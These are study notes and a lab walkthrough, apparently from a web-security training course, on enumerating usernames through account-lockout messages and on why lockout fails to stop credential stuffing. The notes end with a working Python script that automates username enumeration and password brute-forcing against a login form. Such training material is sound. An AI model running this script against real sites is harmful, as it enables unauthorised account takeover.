# Username enumeration via account locking
---
One way in _which websites try to prevent brute-forcing is to lock the account_ if certain suspicious criteria are met, usually a set number of failed login attempts.

`Locking` an account offers a certain amount of protection against targeted brute-forcing of a specific account.
However, this approach fails to adequately prevent brute-force attacks in which the attacker is just trying to gain access to any random account they can.

For **example**, the following method can be used _to work around this kind of protection_.
1. Having a list of candidate usernames that are likely to be valid.
2. Decide on very small shortlist of passwords that you think at least one user is likely to have.
	- For **example**, if you worked out that limit is `3` attempts.
	- You need to pick a maximum of `3` password guesses.

**Account locking also fails** to protect against _credential stuffing attacks_. This involves using a massive dictionary of `username:password` pairs, composed of genuine login credentials stolen in data breaches.

**Credential stuffing** relies on many people `reuse` the same credentials on multiple websites and, therefore, there is a chance that some of the compromised credentials in the dictionary are also valid on the target website.

>[!note]
> _Account locking_ does not protect against _credential stuffing_ because each username is only being attempted once.
> _Credential stuffing_ is particularly dangerous because it can sometimes result in the attacker compromising many different accounts with just single automated attack.

# Lab: Username enumeration via account lock
---
1. With Burp running, investigate the login page and submit an invalid username and password. 
	- Send the `POST /login` request to Burp Intruder.
2. Select the attack type **Cluster bomb**. 
	- Add a payload position to the `username` parameter. 
	- Add a `blank` payload position to the end of the request body by clicking **Add §** twice. 
	- The result should look something like this:
	- `username=§invalid-username§&password=example§§`
3. On the **Payloads** tab, add the list of usernames to the first payload set. 
	- For the second set, select the **Null payloads** type and choose the option to generate 5 payloads. 
	- This will effectively cause each username to be repeated 5 times. Start the attack.
4.  In the results, notice that the responses for one of the usernames were longer than responses when using other usernames. 
	- Study the response more closely and notice that it contains a different error message: `You have made too many incorrect login attempts.` 
	- Make a note of this username.
5.  Create a new Burp Intruder attack on the `POST /login` request, but this time select the **Sniper** attack type. 
	- Set the `username` parameter to the username that you just identified and add a payload position to the `password` parameter.
6.  Add the list of passwords to the payload set and create a grep extraction rule for the error message. Start the attack.
7.  In the results, look at the grep extract column. Notice that there are a couple of different error messages, but one of the responses did not contain any error message. Make a note of this password.
8.  Wait for a minute to allow the account lock to reset. Log in using the username and password that you identified and access the user account page to solve the lab.

```python
#!/usr/bin/env python3
# Username enumeration via account lock
# -------------------------------------
# Kinda confusing lol
import requests
import sys

# Debugging
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
p = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}

def user_list(url, user_path):
    with open(user_path, 'r') as f:
        for users in f.readlines():
            user = users.replace('\n','')
            data = {'username':user, 'password':'wrongpassword'}
            req = requests.post(url, data=data, verify=False, proxies=p)
            if "Invalid username or password." not in req.text:
                return user
            continue
        return False

def pass_list(url, user, pass_path):
    with open(pass_path, 'r') as f:
        for passwords in f.readlines():
            password = passwords.replace('\n','')
            data = {'username':user, 'password':password}
            req = requests.post(url, data=data, verify=False, proxies=p)
            if "Invalid username or password." not in req.text and "You have made too many incorrect login attempts." not in req.text:
                return password
            continue
        return False

if __name__ == "__main__":
    try:
        url = sys.argv[1].strip()
        username = sys.argv[2].strip()
        password = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage: {} <url> <username> <password>".format(sys.argv[0]))
        print("[-] Example: {} http://example.com admin password".format(sys.argv[0]))
        sys.exit(1)
   
    print("[+] Enumerate the username...")
    for i in range(10):
        user = user_list(url, username)
        if user:
            print("[-] Found the username...    [{}]".format(user))
            print("[+] Enumerate the password...")
            passwd = pass_list(url, user, password)
            if passwd:
                print("[-] Found the password...    [{}]".format(passwd))
                break
```